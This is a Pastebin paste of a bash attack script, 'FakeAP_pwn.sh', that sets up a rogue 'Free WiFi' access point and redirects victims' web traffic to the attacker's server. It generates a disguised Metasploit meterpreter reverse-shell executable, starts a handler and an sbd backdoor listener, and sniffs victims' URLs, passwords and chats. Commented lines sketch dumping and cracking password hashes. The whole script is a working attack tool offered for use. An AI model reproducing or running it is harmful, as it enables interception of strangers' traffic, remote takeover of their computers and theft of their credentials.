Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /bin/bash
- # (C)opyright 2009 - g0tmi1k
- #
- # FakeAP_pwn.sh
- # Settings
- export gatewayip=192.168.1.1
- export internet_interface=wlan0
- export fakeap_interface=wlan1
- echo "[>] Starting: FakeAP_pwn - g0tmi1k"
- # FakeAP
- echo "[+] Setting up FakeAP"
- modprobe tun
- xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" $fakeap_interface -v&
- sleep 2
- # Tables
- echo "[+] Setting up forwarding tables..."
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
- #iptables -P FORWARD ACCEPT
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
- # DHCP
- echo "[+] Setting up DHCP server..."
- xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&
- sleep 2
- # Need the user to come here
- echo "[+] Start web server..."
- #xterm -geometry 75x25+1+200 -T WebServer -e sh -c "start-apache"&
- xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
- sleep 2
- # So lets force them!
- echo "[+] Force user to vist our site..."
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- # Bad boy stuff!
- echo "[+] Here comes metasploit..."
- cd /pentest/exploits/framework3
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
- echo "[+] Uploading SBD..."
- xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
- sleep 2
- # upload //root/FakeAP_pwn/ C:/
- # execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
- #./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc
- # Wait till user is connected
- rm -r /tmp/FakeAP_pwn.tmp
- echo "[-] Waitng for target to connect..."
- while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
- sleep 1
- done
- # They give us access to their system, so lets give them internet back ;)
- echo "[+] Give them (our) internet back..."
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
- #iptables -P FORWARD ACCEPT
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
- # Lets connect! =)
- # *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
- echo "[+] Lets us back in..."
- konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&
- sleep 2
- # Get as much info as poss!
- echo "[+] Watch what they do..."
- # URLs
- xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
- # Passwords
- xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
- # IM Chats
- xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
- echo
- echo "[+] DONE - Have you, g0tmi1k?"
- # Lets get some stuff from metasploit whistle we are at it!
- #sysinfo
- #getuid
- #use priv
- #hashdump > /tmp/FakeAP_pwn-hash.txt
- ##session -l
- ##session -i 1
- # Lets crack the hash
- #cd /pentest/passwords/jtr/
- #./john /tmp/FakeAP_pwn-hash.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement